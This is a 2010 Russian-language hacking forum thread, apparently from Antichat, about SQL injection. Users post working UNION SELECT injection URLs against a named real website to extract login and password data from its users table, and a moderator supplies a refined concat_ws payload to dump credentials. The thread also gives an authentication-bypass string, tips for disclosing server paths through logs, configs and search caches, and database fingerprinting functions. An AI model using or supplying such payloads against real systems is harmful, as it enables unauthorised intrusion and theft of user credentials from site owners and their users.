
25.02.2010, 15:01
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Есть иньекция.
Таблицы login and pass я вытащил успешно.
Таблица users
Но при попытке вытащить данные логина и пароля - белый экран или ошибка.
Как обходится этот баг?
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+users-- - белый экран
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+Users-- - ошибка
|
|
|

25.02.2010, 15:11
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
http://brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,count(*),5,6,7+from+users--
0 записей
Последний раз редактировалось Pashkela; 25.02.2010 в 15:25..
|
|
|

25.02.2010, 15:30
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
С нами:
9288289
Репутация:
40
|
|
Не хочет в базу писать русские символы.
Это инъекция, так что запрос только такой.
INSERT _cat SET category='0' а дальше можно дописывать
Код:
INSERT _cat SET category='0', 2_category='0', name_cat='Русский', en_name_cat='sd', description='', sort_index='0'
есть какие то варианты туда их запихнуть всетаки)?
Проблему решил!
name_cat=CHAR(0xF6F3E0F6F3E0 USING cp1251)
Последний раз редактировалось FAQ666; 25.02.2010 в 16:25..
|
|
|

25.02.2010, 19:12
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами:
8854580
Репутация:
34
|
|
как узнать путь до директории сайта на сервере, пути раскрыть короче ?! через текст ошибки в пхп скрипте не получилось...
|
|
|

25.02.2010, 19:25
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
как узнать путь до директории сайта на сервере, пути раскрыть короче ?! через текст ошибки в пхп скрипте не получилось...
1)найти раскрытие в скрипте
2)попробывать найти логи, конфиги а в них пути (список путей к ним здесь )
3)попробывать найти в кеше поисковиков/веб архиве
4)побегать с бубном и угадать
|
|
|

26.02.2010, 00:01
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
С нами:
8559689
Репутация:
5
|
|
Помогите плиз! Бред какойто... тренируюсь в скулях. Вот мой код
PHP код:
if(isset($_POST['login']) && isset($_POST['password']))
{
$login=$_POST['login'];
$password=md5($_POST['password']);
$query="SELECT * FROM users WHERE login='$login' AND password='$password' LIMIT 1";
echo $query;
$response=mysql_query($query);
$result=mysql_fetch_array($response);
if($login==$result['login'] && $password==$result['password'])
$_SESSION['id']=$result['id'];
}
if(!isset($_SESSION['id']))
{
echo "
<form method=post>
<table>
<tr><td>Логин:</td><td><input type=text name=login></td></tr>
<tr><td>Пароль:</td><td><input type=text name=password></td></tr>
<tr><td><input type=submit name=submit value=Вход></td></tr>
</table>";
exit;
}
таблица users:
id | login | password
1 | admin | md5passs
я подставляю в форму логин: admin'; --
пароль: bla bla bla
сделал в сурипте отладочный вывод заппроса
PHP код:
SELECT * FROM users WHERE login='admin'; --' AND password='698d51a19d8a121ce581499d7b701668' LIMIT 1
но нифига не заходит, пишет Warning: mysql_fetch_array(): supplied argument is not a valid MySQL........
|
|
|

26.02.2010, 00:11
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
После каждого запроса дописывай
Код:
or die(mysql_error())
... И будешь видеть суть ошибки.
|
|
|

26.02.2010, 00:34
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
С нами:
8559689
Репутация:
5
|
|
Сообщение от mailbrush
После каждого запроса дописывай
Код:
or die(mysql_error())
... И будешь видеть суть ошибки.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '36eba1e1e343279857ea7f69a597324e' LIMIT 1' at line 1
помогите ктонить знающий в чём трабла?
UPD: зашло двое мемберов и хер кто ответил...
Последний раз редактировалось scorpic393; 26.02.2010 в 00:49..
|
|
|

26.02.2010, 05:13
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
admin' or 'admin'='admin' --
(После -- пробел обязательно =\ )
Сообщение от Ershik
Есть иньекция.
Таблицы login and pass я вытащил успешно.
Таблица users
Но при попытке вытащить данные логина и пароля - белый экран или ошибка.
Как обходится этот баг?
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+users-- - белый экран
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+Users-- - ошибка
http://brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,4,(SELECT+concat_ws(0x3a,logi n,pass)+FROM+users),6,7+--+
Видимо она вообще пустая =\
Последний раз редактировалось Ctacok; 26.02.2010 в 05:28..
|
|
|

26.02.2010, 10:39
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Есть какая-нибудь функция для определения текущей базы без скобок???
Всё кроме неё нашёл, мб кому-то и пригодится
user(), current_user(), system_user(), session_user() = current_user
version() = @@version
ось я только как без скобок знаю @@version_compile_os
А вот database() =???
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 10 (пользователей: 0 , гостей: 10)
|
|
|
|